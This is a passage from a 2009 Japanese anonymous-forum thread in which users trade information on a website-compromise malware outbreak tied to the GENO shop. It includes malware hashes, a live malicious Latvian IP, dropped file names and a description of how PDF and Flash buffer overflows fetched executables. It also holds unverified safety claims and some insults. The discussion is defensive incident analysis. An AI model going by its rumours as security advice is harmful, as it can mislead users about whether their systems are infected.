391 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:14:06
んで何、今GENOは何食わぬ顔で営業したりしてやがってくれちゃったりするわけ?


392 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:15:13
>>390
サンクス

そのMD5でVirusTotalあさってみた
今はもう少し増えていることを願いたい
ttp://www.virustotal.com/analisis/d6a2671a52eac304390d5b6ec241cc21

393 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:16:32
>>391
アンチウイルスソフトがバカ売れでウハウハらしい

394 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:16:40
AMDのCPU使ってても32bit版で動かしてたらx86だろw
AMD64なら大丈夫ってのは64Bit版って事だろ

395 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:19:19
>>388
感染の可能性がある人
・Windows XP以下(SPでも)
・ブラウザで IE/Fx/Sf/Op/GC を使用
・Adobe Reader(Ver 9.1未満)
・Adobe Flash(Ver n.m以下)

感染の可能性が低い(または無い)人
・Windows Vista
・JavaScriptをオフにしている
・Adobe Reader未インストール
・Adobe Reader互換のPDF Readerだけインストールしてある
・スタンドアロン
・sqlsodbc.chmのmd5値が [f639afde02547603a3d3930ee4bf8c12] >101

詳細情報
>336

上記はほぼコピペ

ReaderやFlashの脆弱バージョンについては
ここのスレの奴がかなり詳しいだろうから頼んます

396 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:19:22
あ、394はOSの話ね
64Bitだから感染しないって理由も無い気がするが。

397 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:24:36
親玉らしきファイルが
bxatg.mnn
カスペによると無害だそうだ。
ますます迷宮入り?

398 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:25:22
vistaだけど、そもそもsqlsodbc.chmが無い

399 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:28:21
PCの操作ログたどっていったら %WINDIR%\~.exe が生成されてて C:\_.bat にリネームされてたわw
直前にAdobe Readerが起動してるんでPDFの脆弱性付かれたっぽい。


400 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:29:58
>>395
Vistaは可能性低そうだけど、確定的じゃないから
油断せずにマシンの動作とスレの情報に気をつけておくよ。

情報ありがd

401 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:31:03
>>399
(-ノ-)/Ωチーン
ガンガレ

402 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:34:46
>>54をみるとFlashPlayerのほうは9.0.124未満狙いのようだが
それ以降が安全とも限らんのか

403 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:38:52
a-squaredてアンチマルウェアの方?無印?

404 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:41:43
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090220/325190/
これのたぐいか

405 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:44:46
ノートンとバスターは2月に既に対応してたのか。やるじゃん

406 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:52:52
うちのVistaではsqlsodbc.chmはc:\windows\help\mui\0411にあった

407 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:56:03
>>405
もし、今回のウィルスがこの記事の内容のモノなら、
少なくともノートンとバスター入れてる人は被害に
あってないのかな?


408 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:57:11
今はどんな状況?
GENO以外のサイトにも拡散してるとか聞いたけど

409 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:58:01
わしの超漢字は絶好調

410 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:58:16
>>381
そもそも怪しいサイトって判定も曖昧だよな
俺も常連で通ってて何ともなかったサイトが改変されてた
のを直に体験したことあるんで、『怪しいところは開かない』
という標語の中身のなさを実感した

411 :名無しさん@お腹いっぱい。:2009/04/09(木) 11:59:47
>>406
俺の環境では0409(米語)にもある。
ま、SQL Serverのバージョンによってハッシュも違うし、判断基準として
使うのは難しいよな。

412 : ◆W07s5cWHb. :2009/04/09(木) 12:05:38
>>407
うちはノートン先生を毎日最新定義ファイルで動かしてるけど、
当初はLa.exeも未対応で検出しなかったし、
そもそも感染状態のGenoサイトを踏んでもまったく反応しなかったよ。

結局、Acrobatの脆弱性を突いたウィルスが沢山あって、
今回のウィルスもその一つで、
元々どこのセキュリティソフトメーカーにも対処されていなかっただけって話だよ。

413 : ◆W07s5cWHb. :2009/04/09(木) 12:08:48
補足だけど、ノートン先生は既に現行最新の定義ファイルに更新すれば
ちゃんと検知してくれて
Javascriptを改ざんされていてラトビアに飛ばされるサイトを踏んでも
感染を未然に防ぐ。
てか、これはノートン先生以外でも恐らく同程度の対処は既に行われている筈。

414 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:10:41
既にウイルス入られてる人は先生もカスペも無反応って言ってたけど
あれ改善されたのかな?

415 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:12:50
山田チェッカーみたいに、感染してるか否か検査できるツールがあれば便利なのにね

416 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:15:16
>>363
Adobe Reader 7のバージョンは7.10?

417 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:17:24
sqlsodbc.HLPとsqlsodbc.GIDはあるけど
sqlsodbc.chmのファイル自体がない。
GIDの更新日時が今日になってるのが気になるんだけど
まさか拡張子偽装まではしないよね?

418 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:22:02
パソコン一般の方に一人親玉らしき献体持ってる奴いたな
そいつのはVTで反応してたんだけど

419 : ◆W07s5cWHb. :2009/04/09(木) 12:23:02
>>414
少なくてもPC上に保存されていたla.exeに関しては
ノートン先生はZIP内のものも、UPX圧縮を解除したものに関しても即効で検知して
ぶっとばしてくれた。

恐らく他のセキュリティソフトも同様だと思う。

ただ、あんたはなにもわかってないみたいだから一言言うけど
ウィルスを食らった後の場合はそもそもセキュリティソフトで検知して駆除したから安心なんて話じゃなくて
原理原則的に可及的速やかにクリーンインストールかリカバリしないと駄目だよ。絶対に。

420 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:27:37
jsファイルは大体各ベンダー対応してるみたいだし
今後感染心配してる奴はAVアップデートすればいいと思う
で問題が感染後にドロップするファイルでこのドロップするファイルの採取が難しくて
未だにAVは役立たずという状態

421 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:28:49
>>412-413

973 名前: オステオスペルマム(dion軍)[] 投稿日:2009/04/09(木) 11:35:08.65 ID:jWIkg7dG
思い出スレになってんだろうと思って見に来たけどどうなってんだ。
収束してないどころかまだ拡散中?

982 名前: マンサク(大阪府)[] 投稿日:2009/04/09(木) 11:54:31.16 ID:g6SEJUpr
>>973
ウイルス仕込まれてるサイトが拡大してる。
セキュ板解析班がウイルスの親玉らしきファイルを特定したが
各ベンダーのアンチウイルスではスルー。

【結論】
何一つ解決してない。

422 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:29:02
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/

423 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:29:35
la.exeは結局
HKLM\?SOFTWARE\?Microsoft\?Windows NT\?CurrentVersion\?Drivers32\aux
にドライバ登録して、それが再起動時になんかやってんだよね?
何やってんのかわかる人いない?


424 : ◆W07s5cWHb. :2009/04/09(木) 12:32:42
>>421
てか、おいらはν速の人なんて
そっちのスレの中身は把握してます><

425 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:33:52
アクロバットは使って無くてFoxit Reader使ってるんですが
Versionは先月以降更新されてないようです。
このままでは危ないですか?

Foxit Reader 3.0 Build 1506 03/09/09

426 :414:2009/04/09(木) 12:33:57
>>419
ごめんなんか怒らせた?

もちろん自分の場合は必ずリカバリするよ。
ただそういう話が出てたけどどうなったのかなと思って

427 : ◆W07s5cWHb. :2009/04/09(木) 12:37:18
>>423
その辺はla.exeを逆アセンブルしてソースを解読して
La.exeの処理内容を把握しないと駄目なんだけど、
このスレには残念ながら現状ではその種のスキルがある奴がいないんだと思う。

プログラマ板から有能なプログラマを召還して解析しないとだめかもしらんね。

428 : ◆W07s5cWHb. :2009/04/09(木) 12:38:43
>>426
全然怒ってないよん♪

ただ、あまり無闇に怯えたり、逆にやたらに過信しても駄目って事をいいたいだけ。

429 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:43:32
親玉を引っ張り出すところまでしかわかってなくて、
親玉が何をするかは一切不明なんだよね 今のところ。
ただ、ブラウザが落ちまくったりとかの症状しかあがってない。

430 :414:2009/04/09(木) 12:44:14
下手に出れば調子に乗りやがって
いい加減巣に帰れゴミカス

431 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:46:16
>>430
勝手に俺を名乗るなw

432 : ◆W07s5cWHb. :2009/04/09(木) 12:49:06
>>431
だからここはID出ない過疎板なんだから
まともなレスを付けたり詐称されたくないのなら
トリップつけるしかないだろってのw

そもそもウィルス並の基地外がわんさかいる板なんだからw

433 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:49:07
こえ〜
リカバリでWin回復しても、データなかったら意味ない
今回はセキュリティソフトの完敗か

434 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:49:29
ウイルス解析よりもウイルスを各ベンダーに送って対応してもらうのが先

それとLa.EXEが引き金で感染したやつはいないだろ?
これはまた別URL(同じラトビアIP)から
ダウンロードしたものであって今回のGENO騒動とはノータッチの筈

ホームページ経由の感染に絞って解析を進めるべき

435 : ◆W07s5cWHb. :2009/04/09(木) 12:55:00
>>434
それならあとは大方出尽くして鯖側の感染経路の特定位しか残ってないと思うけど、
そのへんになるとそれこそ囮鯖でも立ててクラッカーにクラッキングして貰う位しか残ってないと思うよ。
結局、FTPパスが何らかの方法で事前に漏れて、FTPで直に鯖にログインされて堂々と改ざんされているって説が
全世界的に有力になってるけど、
それの裏づけ作業みたいな感じのをまだ誰もやっていないんで、それをやるとか。

ちなみに検体提出なんてとっくに済んでるでしょ。

436 :名無しさん@お腹いっぱい。:2009/04/09(木) 12:55:26
>>434
なんでそこを切り離そうとするんだよ
GENOの怠慢な対応でウイルスをダウンロードして実行する
ウイルスを配布した事実を隠そうとしてるのか?

437 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:00:24
ちなみに今回のが2000/XP狙いうちでVISTAは大丈夫ってのは
どういう根拠なん?

438 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:01:27
>>437
>>137

439 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:02:51
>>436
だからGENOその他汚染されたサイトで感染する今回のウイルス侵入経路でLa.exeなんてものは少しも絡んでない。

GENOのサイトをみてPDF又はFLASHのExploitで感染→La.exeが作られる
なら解るがここでいってるLa.exeは別URLの物だろ?

440 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:03:02
よくいくFLA板は今すげぇ過疎ってるのにID出てるんだよなぁ…。
昔は盛り上がってたからだろうけどね。

441 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:04:47
>>434
だって仮想PCじゃadobeReaderがエラー吐いて落ちるだけなんだもん
つまんないじゃん


442 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:06:01
>>439
GENO観覧→(中略)→ブラウザが壊れOSも不安定

これが全て。

443 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:06:19
>>435
感染後に作られる少数ファイル、一部の感染元ファイルはまだ。
それは今晩やる予定

444 : ◆W07s5cWHb. :2009/04/09(木) 13:07:11
>>437
ウィルス内の処理の一部でUserAgentを参照して
2kやXPのみを対象にしていた点と>>137の点。

ただ、VistaでもUAを詐称して踏んだ場合とか、
UA詐称をしない場合でもウィルスをモロに食らう形ではなくても部分的に食らってしまう事はあるかと思う。

いずれにしてもUACをどこまで信用するかって話になる。
個人的にはDEPもUACも過信するほど強固ではないと思うよ。

445 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:11:30
La.exeとGENO経由の感染、解析レポートがごっちゃになりそうだから
ホームページ経由の感染を解析したほうが滅茶苦茶にならないと思ったんだけど
La.exeがホームページ経由の感染タイプと全く同じとは現段階では言い切れないから

446 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:12:09
バッファオーバーランを起こせるなら、La.exeみたいな実行ファイルをどこかに残す必要はないんじゃないかと思うんだが。
一番の問題はサイトのjsをあっさり書き換えられてるってことじゃないか。

447 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:14:08
うわあ・・・

特別な動作するときに逐一許可してくれるうざいやつでしょ
VISTAの高速化設定とかで本やサイト見てUAC切ってた・・・

というユーザー多いんじゃ

448 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:16:45
>>446
海外でjs改竄されたおなの子はftpパス盗まれたと言ってる
どう盗まれたまでは書いてない

449 : ◆W07s5cWHb. :2009/04/09(木) 13:17:45
>>447
UACを切ってた場合もそうだし、
そもそもHDD上のファイル書き換えではなくて
メモリ上のExplorer.exeを書き換えて悪さをしているみたいなんだから
そこでなにかやられたらそれこそアウト。

ぶっちゃけ、たとえVistaでUACを入れててもも
レジストリを下手に書き換えられたりした時点で負けってレベル。

450 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:17:55
>>448
そのソースは?

451 : ◆W07s5cWHb. :2009/04/09(木) 13:20:15
>>448
どう盗まれていたかまで判っていたら
恐らくそのおんなのこがクラッカーだろw

452 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:22:31
ttp://www.dynamicdrive.com/forums/archive/index.php/t-43390.html
ttp://forums.powweb.com/showthread.php?t=82104

これかな

453 : ◆W07s5cWHb. :2009/04/09(木) 13:25:07
>>446
これ以上のサイト側の感染を抑止する為にはその部分の調査も必要だけど、
ホントはそんな解析をプロの業者にやらせたら軽く1000万位取られても当然ってレベルだよなw

いずれにしてもこれまでに感染が確認されたサイトが稼動しているOS、httpd、CMSがそれぞれバラバラなんで、
単純にこれらのセキュリティホールが突かれているっていう単純な話ではない様な気がする。

454 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:25:31
>>449
VISTAは大勝負ってのは大ウソか

455 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:26:00
>>405
先生入れてるけど4月4日にGENO踏んでAdobe起動
スキャン→無反応 だけど違和感を感じる
カスペでオンラインスキャン→トロイ検出。

456 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:26:50
>404

ただしハードウエアの環境によっては、ウイルスプログラムが実行されずに、
Adobe Readerが強制終了させられるだけの場合もあるという。

これがAMD64の事かな?

457 : ◆W07s5cWHb. :2009/04/09(木) 13:29:05
>>454
少なくてもUACを切って使っているのがデフォだと思うんで、
そーいう奴は知らず知らずにキーロガー等だけ仕込まれてて涙目って感じだと思う。
とにかく、過信や油断したら負けだと思う。

458 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:33:30
UACってあれか、コンパネいじくってるとよく出てくる「許可くれよ」ってやつか
あれを切って、許可する手間が省ける以外にメリットあんの?

459 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:33:47
>>439
?id=2の変造PDFによるバッファオーバーフローで?id=10のexeがダウンロード・実行させる
その1つが通称La.exe
?id=10で落ちてくるexeは数種類あるようだ
時間とともに差し替えられたのか、何らかの条件に基づいて選ばれるのか、はたまた
ランダムなのかは不明

いわゆるLa.exe(15872 bytes)
6de7f96fe398ca304b1992869faf55c7

いわゆる8lv.exe(15360 bytes)【実物は未確認】
791509d03706cbc8883536b5131341d4

さらに別のexe(16384 bytes)
2586a42cfdc03ea62694f5641b5d7633

また、?id=3のFlash(swf)もバッファオーバーフローを引き起こす変造ファイルだと
思われるが詳細不明

460 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:34:26
カスペのオンラインが薦められてるけどノートンのオンラインスキャンでも検知してくれますか?

461 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:35:22
UAC嫌でVISTA使う意味が分からん


462 : ◆W07s5cWHb. :2009/04/09(木) 13:37:38
>>459
補足すると、それらのEXEに共通するのは皆u.batを生成するって点だよね。

>>439さんは既存の海外のウィルス情報に全然目を通していないみたいだけど、
もうちょっと勉強したほうがいいと思う。

463 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:37:41
>>457 トン。

>>458
例えば、だ。

VISTA使いが2ちゃで短縮urlやただの画像を踏んだ時
そうした警告がでたらどうする

464 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:39:19
XPの制限ユーザーでもGENOにやられますか?

465 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:41:14
あれ・・・
>>458
UAC切ってメリット →UAC使ってメリット と脳内変換してた、ごめん

466 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:42:16
よし、今から俺が初心者質問対応係になるよ
ただし、今から寝る。いつ起きるかもわからん。

467 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:43:56
>>452
英語力なさすぎて嘆いてるのか本気で言ってるのか読めない

468 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:45:01
頭が禿げてきたんだけどこれなにウィルス?

469 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:46:14
HAGENOウイルス

470 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:46:48
>>460
対応は遅かったけど、今は先生でもOK

471 : ◆W07s5cWHb. :2009/04/09(木) 13:47:11
>>468
白癬菌ウィルス。

最寄の皮膚科へどうぞw

472 :439:2009/04/09(木) 13:48:58
>>459
なる程、
勘違いしてたわw

473 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:51:11
>>471
水虫かよ。

474 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:52:28
VB2009が蹴ったアドレス、末尾が?id=101だった。
この末尾の数字が違うと、落ちてくるウイルスも違うってことかな?

475 :名無しさん@お腹いっぱい。:2009/04/09(木) 13:54:32
>>474
それはわからない
ただ共通してu.batを作るのはわかってる


476 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:01:44
まぁ自業自得だな
いまだにXP使ってるからこういうことになる VISTAなら大丈夫

VISTA SP1 Mozilla Firefox
Adobe Reader 9 flash プレーヤー10
が最強

477 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:06:36
笑ってあげたほうがいいかな?
わし的には失笑なんだが

478 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:08:04
>>477
海外では3月28日の報告があるみたいだ。

479 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:17:39
高校入学祝いにやっと買ってもらってPCがVISTA機で
中学時代にXP機買ってもらってるツレに相手にされない
香具師がうるさいスレはここですか

480 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:26:50
>>479
高校入学祝いに買ってもらったPCは n88日本語BASICが
付いたPC9801VXだったお!!

481 : ◆W07s5cWHb. :2009/04/09(木) 14:28:08
ラトビアのIPの94.247.2.195でぐぐると
↓の公開DBがヒットしたわ。

これを見た限り、少なくても3/25の段階で
ラトビアのIPに関してチェックしようとしている人がいたんで、
クラッカーがウィルスの動作チェック等に使ったのか
サイトを書き換えられてしまったWebマスター等が確認の為に使ってた痕跡だと思う。

VisualRoute Database Reporting
ttp://visualroute.visualware.com/search?dfromtext=
2009%2F03%2F24+19%3A55.56&dtotext=2009%2F03%2F25+19%3A55.56&pg=21&perpg=50
※URL長すぎなんて改行してます。。。

ぐーぐる先生の日本語訳
ttp://translate.google.co.jp/translate?hl=ja&sl=en&u=http://visualroute.visualware.com/
search%3Fdfromtext%3D2009%252F03%252F24%2B19%253A55.56%26dtotext
%3D2009%252F03%252F25%2B19%253A55.56%26pg%3D21%26perpg%3D50&ei=
ioXdSfbEB8yNkAX2l9ybDg&sa=X&oi=translate&resnum=1&ct=result&prev=
/search%3Fq%3D94.247.2.195%26hl%3Dja%26lr%3D%26sa%3DN%26start%3D60
※URL長すぎなんて改行してます。。。

482 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:29:32
中学入学祝いにせがんだのがappleUplus

483 : ◆W07s5cWHb. :2009/04/09(木) 14:31:13
小学生の頃に友達がPC6001を買ってもらったのに触発して
親に駄々こねて買ってもらったのがSordのM5♪

484 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:32:37
馬鹿にされ、MSからもスルーされ、各業界からも屑扱い
悲しい日々を送っている糞OSのVISTA厨歓喜!
 
でもVISTAが大丈夫というのは都市伝説だったwww

485 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:33:38
XP豚涙拭けよ?>>484


486 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:35:46
XP使ってるゴミどもw


487 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:39:44
>>407
バスター2009入れてたけど感染したよorz
不正変更の監視がエクスプローラの書き換え要求を検知したけど
もうその時点では感染してやられてたわけだから後の祭り。
キャッシュに残ってた本体exeもスクリプトも感染後にチェックしてもスルーだった。

つーか毎回こんなこと書いてるな俺。
operaなら大丈夫?
orz
AMD64なら大丈夫?
orz
バスターはいってれば大丈夫?
orz

488 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:44:49
>>459
> いわゆる8lv.exe(15360 bytes)【実物は未確認】

俺はこれだった。
バイト数でしか確認してないが、キャッシュに残ってた。
バスターは安全と判断してくれました。

489 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:46:49
firefoxで94.247.2.195にアクセスしたらセーフブラウジングが遮断した
以下そこに表示された「このサイトがブロックされる理由」

セーフ ブラウジング
94.247.2.0 の診断ページ

94.247.2.0 の現在のステータス
現在のところ、このサイトは疑わしくないと認識されています。

Google による巡回テスト状況
このサイトで過去 90 日間に Google がテストした 272 ページのうち 0 ページで、ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは2009-04-07で、このサイトで不審なコンテンツが最後に検出されたのは2009-04-07です。
Malicious software includes 240 scripting exploit(s), 16 trojan(s), 5 exploit(s).
This site was hosted on 1 network(s) including AS12553.

有害な不正ソフトの感染を広げる媒介をしていたかどうか
過去 90 日に、94.247.2.0 は ultimathulelodge.com/, zavallis.com/, databpo.com/ を含む 4 サイトの感染媒体として機能していたようです。

不正なソフトウェアをホストしていたかどうか
はい、このサイトでは不正なソフトウェアのホスティングが過去 90 日の間に検知されています。serona.pe.kr/, hitzwallpaper.com/, firat.edu.tr/ を含む 7560 個のドメインを感染させています。

Updated 36 hours ago

490 :名無しさん@お腹いっぱい。:2009/04/09(木) 14:50:02
7560・・・

491 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:00:57
>7560 個のドメインを感染させています。

ちょっとwなにそれ

492 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:01:36
悪意あるウェブサイトが進化、セキュリティベンダーの目を盗む手口も
ttp://www.security-next.com/010092.html

493 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:04:48
そろそろ騒動も下火になってきたな。

494 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:07:53
サイト乗っ取り→ゼロデイアタック→あぼん
序章にすぎん

495 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:09:16
某サイトの青板には今回のウイルス被害はないのか

496 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:10:44
>>493
つかまだ騒動知らない人の方が大半だよ。
今後改竄されたサイトが増えるにつれて更に被害が拡大するだろ。


497 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:12:56
ノーガードでもadobeも一切入れてない俺は完全セーフ。
ノーガードの俺にいつも文句言ってたおまいら涙目w

498 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:14:50
>>495
なんせログに現れないからな
実はいたりして

SpywareWarriorで話題にはなってたな

499 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:14:52
282 : クレマチス・モンタナ(北海道) [] :2009/04/07(火) 21:43:42.14 ID:CWnPkqk+
flash playerについて試してみた。IE6/2k。
やっぱりこのswfは flash player 9.0.115.0 以前に存在する脆弱性を利用したもの。
9.0.115.0でswfを読み込んでみたが、実行ファイルがダウンロードされコマンドプロンプトが立ち上がる。
9.0.124.0 以上であれば何も起こらず、攻撃は失敗するようだ。

500 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:17:53
何時亜種が出てもおかしくない状況で
「俺は○○○だから感染しない」とか言ってる奴は
危機意識が薄すぎるだろw

501 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:18:43
安価忘れてた
>>395
>>499

502 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:21:11
>>500
主にν速民だな

503 : ◆W07s5cWHb. :2009/04/09(木) 15:22:51
>>502
ν速民でもおいらみたいな情報強者もちゃんといるんだけどなw

504 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:24:18
だよなぁ・・・ここ数日は触れ始めたばかりのUbuntuLinuxに
火狐+addonでネット系は使ってるけどこれだって安心とは言えないでしょ?

505 : ◆W07s5cWHb. :2009/04/09(木) 15:26:56
>>504
今や、本当に安全なWeb閲覧環境なんてPC-DOSとWebBoyの組み合わせ位しかないと思うw
殆どのサイトが閲覧不可だけどなw
てか、発売元のIBMのサイトすらブラウズ出来ないと思う。試したこと無いけど。

506 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:28:23
7560…。社内に注意喚起しておこう。これは洒落にならん。
客先から問い合わせが殺到する前に手を打っておこう。

507 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:29:55
こりゃ、サイバーテロものだな

508 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:30:22
セキュ板でコテつける奴って変な奴しかいないよな


509 : ◆W07s5cWHb. :2009/04/09(木) 15:30:31
>>506
IT担当者として適切な対応だね。
イントラ掲示板とか、社内回覧板なんかで注意喚起を促したほうが良いと思う。

510 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:31:12
CNET
ttp://japan.cnet.com/blog/sec_newbie/2009/04/07/entry_27021630/

511 : ◆W07s5cWHb. :2009/04/09(木) 15:31:14
>>508
だから本当は酉使いたくないんだけど、この際仕方ない。

512 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:33:50
>>511
なにが仕方がないの?

513 : ◆W07s5cWHb. :2009/04/09(木) 15:37:38
>>512
ウィルス並の基地外に成りすまされたくないからw
ここはID無しの釣堀なんだから仕方ないだろw

514 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:39:23
ID出ない板だからじゃね。見るほうも酉付けてもらったほうがいいわ。

515 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:41:41
むしろコテでまともなやつなんて
ほとんど見たことない
まぁ例外もあるけど

酉は付けてもらわないとむしろ困る

516 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:42:24
やたらComboFix、ComboFix言って
一時期いたSmitFraudFix無責任に進める奴、使う奴が出てきそうな感じw

517 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:44:36
酉つけなくても発言内容が薄ら寒いからわかる

518 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:47:43
いつも通り殺伐としてきて安心した

519 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:48:18
ラトビアのほう、サーバ管理者にコンテンツ消されたかな
クッキーを食わせるJavaScriptも返ってこなくなった
代わりに「There is no site at this address!!」というテキストが

520 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:51:42
マルウェア配布サイトは大抵数日て消えるからな

521 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:52:43
>519

生きてるよ

522 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:52:45
見る側のセキュリティ対策はもちろんだが、
サイト運営管理の側も改竄されないようにちゃんと対策しといてもらいたい。
検出未対応な強力ウィルスを使われたらどうにもならん。

523 : ◆W07s5cWHb. :2009/04/09(木) 15:56:26
>>517
ぎくっ

まぁ、文体でバレバレだと思うけど、逆に簡単に成りすまされやすいんで。

524 :名無しさん@お腹いっぱい。:2009/04/09(木) 15:57:02
ttp://itpro.nikkeibp.co.jp/article/NEWS/20090225/325493/
ttp://www.ipa.go.jp/security/ciadr/vul/20090311-adobe.html

Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正した最新版とか
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正した最新版ですかね

525 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:29:44
>>336あたりまとめてJPCert/CCにも送ってみるよ
あそこのMLで流れてくれればおそらく被害が出てる
企業なんかでもこれを知る人が出てくるとおもう

526 : ◆W07s5cWHb. :2009/04/09(木) 16:33:35
>>525
判ってると思うけど、>>336の最後の結論はネタだからな。

527 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:39:16
>>521
jquery.jsは生きてますな
ほかは内容をエラーメッセージに変えただけか

528 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:41:10
酉付けてるなら無駄話してないで早く全貌を解明して
対策と対処を明確にしたまえ。

529 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:41:59
>>526
もちろんはあくだ

まとめてて思ったけどクライアントPC視点とWebサーバ視点の
両方報告いるねこれ

530 : ◆W07s5cWHb. :2009/04/09(木) 16:44:14
>>529
そう。

鯖側に関してもまだ感染経路が判明していないんでその点の注意喚起も必要。
てか、これ以上の被害拡大を防ぐ手立ては鯖の感染数を減らすのが一番なんだから。

531 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:46:49
>492

>527

532 :名無しさん@お腹いっぱい。:2009/04/09(木) 16:52:44
  【審議中】
        _,,..,,,,_   _,,..,,,,_
     _,,..,,,_/ ・ω・ヽ/・ω・ ヽ,..,,,,_
    ./ ・ω_,,..,,,,_  l _,,..,,,,_/ω・  ヽ
   |   /   ・ヽ /・   ヽ    l
    `'ー--l      ll      l---‐´
       `'ー---‐´`'ー---‐´

533 : ◆N9P3SuvBPo :2009/04/09(木) 17:01:14
HijackThisやRSITのログにも現れないということだが、
SilentRunnersやKVRTやGMERのログにも現れないのか?

534 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:09:34
tp://internet.watch.impress.co.jp/cda/news/2009/04/09/23085.html

535 :名無しさん@お腹いっぱい。:2009/04/09(木) 17:14:43
とりあえずこんな感じにまとめてみたけど
